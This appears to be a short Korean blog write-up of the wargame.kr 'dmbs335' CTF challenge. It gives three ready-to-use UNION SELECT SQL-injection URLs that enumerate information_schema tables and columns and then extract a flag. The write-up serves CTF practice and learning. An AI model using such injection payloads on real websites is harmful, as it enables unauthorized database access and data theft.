search_cols에 preg_match에 속하지 않는 값을 넣고
$_SERVER['QUERY_STRING'] 덕분에 $query_parts를 조작가능
where_clause=query_parts이므로 여기에 union문을 넣어주자
http://wargame.kr:8080/dmbs335/?search_cols=111&keyword=0&query_parts=0%20union%20select%201,2,3,table_name%20from%20information_schema.tables&operator=or
table_name=Th1s_1s_Flag_tbl
http://wargame.kr:8080/dmbs335/?search_cols=111&keyword=0&query_parts=0%20union%20select%201,2,3,column_name%20from%20information_schema.columns&operator=or
colum_name=f1ag
끝
http://wargame.kr:8080/dmbs335/?search_cols=111&keyword=0&query_parts=0%20union%20select%201,2,3,f1ag%20from%20Th1s_1s_Flag_tbl&operator=or
'war game > wargame.kr' 카테고리의 다른 글
| [wargame.kr]ip_log_table (0) | 2017.03.02 |
|---|---|
| [wargame.kr]lonely_guys (0) | 2017.03.02 |
| [wargame.kr]simple board (0) | 2017.02.24 |
| [wargame.kr]md5_password (0) | 2017.02.24 |
| [wargame.kr]web_chatting - sql_injection (0) | 2017.02.20 |